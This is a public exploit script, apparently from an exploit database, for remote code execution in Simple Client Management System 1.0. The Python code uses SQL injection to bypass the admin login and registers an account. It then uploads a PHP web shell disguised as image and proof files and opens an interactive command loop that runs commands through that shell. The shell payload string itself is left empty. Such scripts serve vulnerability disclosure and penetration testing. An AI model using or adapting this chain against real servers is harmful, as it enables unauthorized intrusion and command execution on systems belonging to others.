# Exploit Title: Simple Client Management System 1.0 - Remote Code Execution (RCE) # Date: July 4, 2021 # Exploit Author: Ishan Saha # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/client-details.zip # Version: 1.0 # Tested on: Windows 10 Home 64 Bit + Wampserver Version 3.2.3 & Ubuntu & Kali #!/usr/bin/python # Description: # 1. This uses the SQL injection to bypass the admin login and create a new user # 2. The new user makes a client with the shell payload and uploads the generic shellcode into the server # 3. the shell is called from the location import requests from colorama import Fore, Back, Style ''' Description: Using the sql injeciton to bypass the login and create a user. This user creates a client with the shell as an image and uploads the shell. The shell is called by the requests library for easier use. ------------------------------------------ Developed by - Ishan Saha & HackerCTF team (https://twitter.com/hackerctf) ------------------------------------------ ''' # Variables : change the URL according to need URL="http://192.168.0.248/client/" shellcode = "" filename = "shell.php" authdata={"username":"admin' or '1'='1","password":"admin' or '1'='1","login":"Submit Query"} createuser = {"fname":"ishan","lname":"saha","email":"research@hackerctf.com","password":"Grow_with_hackerctf","contact":"1234567890","signup":"Sign Up"} userlogin={"uemail":"research@hackerctf.com","password":"Grow_with_hackerctf","login":"LOG IN"} shelldata={"fname":"a","lname":"l","uname":"l","email":"l@l.l","phone":"1234567890","plan":"k","pprice":"k","proofno":"l","caddress":"ll","haddress":"ll","rdate":"9/9/09","bdate":"9/9/09","depatment":"l","csubmit":"Submit"} def format_text(title,item): cr = '\r\n' section_break=cr + '*'*(len(str(item))+len(title)+ 3) + cr item=str(item) text= Fore.YELLOW +section_break + Style.BRIGHT+ Fore.RED + title + Fore.RESET +" : "+ Fore.BLUE + item + Fore.YELLOW + section_break + Fore.RESET return text ShellSession = requests.Session() response = ShellSession.get(URL) response = ShellSession.post(URL + "admin/index.php",data=authdata) response = ShellSession.post(URL + "admin/regester.php",data=createuser) response = ShellSession.post(URL,data=userlogin) response = ShellSession.post(URL + "create.php",data=shelldata,files={"uimg":(filename,shellcode,"application/php"),"proof1":(filename,shellcode,"application/php"),"proof2":(filename,shellcode,"application/php")}) location = URL +"img/" + filename #print statements print(format_text("Target",URL),end='') print(format_text("Shell Upload","success" if response.status_code ==200 else "fail"),end='') print(format_text("shell location",location),end='') print(format_text("Initiating Shell","[*]Note- This is a custom shell, upgrade to NC!")) while True: cmd = input(Style.BRIGHT+ Fore.RED+"SHELL>>> "+ Fore.RESET) if cmd == 'exit': break print(ShellSession.get(location + "?cmd="+cmd).content.decode())